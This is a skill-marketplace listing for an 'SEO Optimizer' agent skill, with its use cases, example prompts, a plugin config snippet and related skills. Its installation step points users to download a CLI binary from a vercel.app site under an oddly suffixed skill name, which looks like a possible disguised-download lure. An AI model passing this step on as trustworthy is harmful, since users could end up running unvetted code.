seo-optimizer
This skill should be used when analyzing HTML/CSS websites for SEO optimization, fixing SEO issues, generating SEO reports, or implementing SEO best practices. Use when the user requests SEO audits, optimization, meta tag improvements, schema markup implementation, sitemap generation, or general search engine optimization tasks.
Why use this skill?
Analyze your HTML/CSS websites for SEO issues, improve meta tags, fix heading structures, and generate comprehensive SEO reports with the OpenClaw SEO Optimizer skill.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/thiagoruss0/seo-optimizerc6ynbWhat This Skill Does
The SEO Optimizer skill acts as an intelligent assistant for web developers and content managers to ensure their HTML/CSS websites are fully optimized for search engines. It utilizes the OpenClawCLI to scan project directories or individual files, identifying critical issues such as missing meta tags, improper heading structures, missing image alt attributes, and technical SEO deficiencies. The skill provides actionable feedback, helping users improve site performance, accessibility, and search engine visibility through structured analysis and automated reporting.
Installation
To use this skill, ensure the OpenClawCLI is installed on your system. You can download and install the CLI for Windows or MacOS by visiting https://openclawcli.vercel.app/. Once installed, run the following command in your terminal to integrate the skill:
clawhub install openclaw/skills/skills/thiagoruss0/seo-optimizerc6ynb
Use Cases
Use the SEO Optimizer when you are building or maintaining a website and need to ensure compliance with modern SEO standards. This includes auditing a site for search engine ranking issues, fixing broken meta data, ensuring proper Schema.org markup for rich snippets, and verifying that accessibility best practices (like alt text) are met. It is ideal for developers preparing a site for production or digital marketers looking to audit existing content.
Example Prompts
- 'Run an SEO audit on my current project directory and provide a summary of the critical issues found.'
- 'Analyze index.html and tell me what meta tags or schema markup I should add to improve my rankings.'
- 'Generate a JSON report of all image alt tag issues in my ./src folder.'
Tips & Limitations
The SEO Optimizer is most effective when run during the development phase. While it can suggest improvements for meta tags and heading structures, it cannot evaluate dynamic content rendered via JavaScript without proper configuration. Always review the 'Critical Issues' list first, as these have the highest impact on your site's discoverability. Ensure your file paths are accessible to the CLI, and remember to use the --json flag if you intend to pipe the output into other automation tools for reporting.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-thiagoruss0-seo-optimizerc6ynb": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: file-read, code-execution
Related Skills
n8n
Manage n8n workflows and automations via API. Use when working with n8n workflows, executions, or automation tasks - listing workflows, activating/deactivating, checking execution status, manually triggering workflows, or debugging automation issues.
Read WeChat local data from SQLite databases. Supports listing contacts, chat sessions, searching messages, and viewing favorites. Use when the user needs to access their own WeChat data stored locally. Requires access to WeChat data directory. Read-only operations only.
coding-agent
Run Codex CLI, Claude Code, OpenCode, or Pi Coding Agent via background process for programmatic control.
veo3-gen
Generate and stitch short videos via Google Veo 3.x using the Gemini API (google-genai). Use when you need to create video clips from prompts (ads, UGC-style clips, product demos) and want a reproducible CLI workflow (generate, poll, download MP4, optionally stitch multiple segments).
jira
Jira API integration with managed OAuth. Search issues with JQL, create and update issues, manage projects and transitions. Use this skill when users want to interact with Jira issues, projects, or workflows. For other third party apps, use the api-gateway skill (https://clawhub.ai/byungkyu/api-gateway).